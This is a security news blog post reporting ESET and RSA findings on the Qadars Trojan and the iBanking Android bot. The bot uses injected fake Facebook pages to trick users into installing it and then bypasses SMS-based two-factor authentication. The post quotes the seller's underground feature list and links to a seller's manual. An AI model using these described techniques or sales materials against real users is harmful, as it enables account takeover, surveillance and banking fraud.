Android Trojan Virus: iBanking Malware ‘Qadars’ Targets Facebook Users via Webinjects


Cyber criminals have targeted millions of Facebook users through a sophisticated Android Trojan app that can bypass the two-factor authentication shield used by Facebook mobile users, says a Slovakian security firm.

ESET, an IT security firm, has identified a new variant of the banking Trojan ‘Qadars,’ which injects rogue JavaScript code into Facebook pages when accessed through an infected system’s browser.

The iBanking bot, when installed on a mobile phone, can easily spy on user’s communications, redirect incoming voice calls, and even capture audio using the device’s microphone.

It is able to bypass the mobile two-factor authentication, commonly called as mobile transaction authorization number, mTan or mToken, used by several financial institutions to verify and authorize banking transactions.

How it works:

Once the user logs into his Facebook account from a mobile phone, the malware tries to inject a fake facebook verification page leading to malicious android application, which seeks the user’s phone number and confirmation for using Android on the phone or tab.

Once the phone number is entered, the user is directed to an SMS verification step. The new SMS verification webpage also instructs the users to download the application from the link provided in case they did not receive any message from the Facebook.

Then, an installation guide directs the users to install the new application.

Once installed, the bot takes complete control over the mobile.

A detailed infographic about the malware is presented by the ESET security community.

Jean-Ian Boutin, an ESET malware researcher, says, “The Trojan is able to intercept a webpage downloaded from a webserver, inspect it and inject new content into the page before showing it to the user. In the webinject configuration file I received, one of the targets was the Facebook website.”

Challenges:

This application was on sale in underground forums with a detailed explanation of how it works, according to an independent researcher Kafeine

The website selling the bot lists its features as:

  • Grabbing all information about the victim (Phone Number, ICCID, IMEI, IMSI, Model, OS)
  • Interception of incoming SMS messages and sending them to the web-panel and the control room.
  • Call forwarding to any number
  • Grabbing all incoming and outgoing SM
  • Grabbing all incoming and outgoing calls
  • Grabbing books with contacts ( names and numbers )
  • Record audio , sending it to the server ( know what is happening around)
  • Sending SMS to any room without the owner’s knowledge
  • The application can not be removed if the owner when installing given administrator rights .
  • Function demolition system to the factory settings (if the admin rights ) Our coders with ease for you finalize your desired functionality. Easy Web Panel:
  • Here is the socket to work with bots who wants to touch live , write, do a test account .
  • http://www.tmn-security.pt/ris.JPG
  • Just for you produced a manual on the bot :
  • http://www.tmn-security.pt/manual.pdf

RSA, an IT security community, recently tracked a forum that leaked the iBanking mobile bot control panel source code. The leaked files also included a builder that can be used in various configurations and combinations by cyber criminals to create unique specific applications.

The security firm also noted that the web-based control panel of the bot provides its masters with complete control of the infected mobile device.

The researchers further note,

This highlights the need for stronger authentication solutions capable of validating users’ identities using multiple factors including biometric solutions. The latter will also assist in reducing the dependency on conscious human intervention making social engineering attempts void.”

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s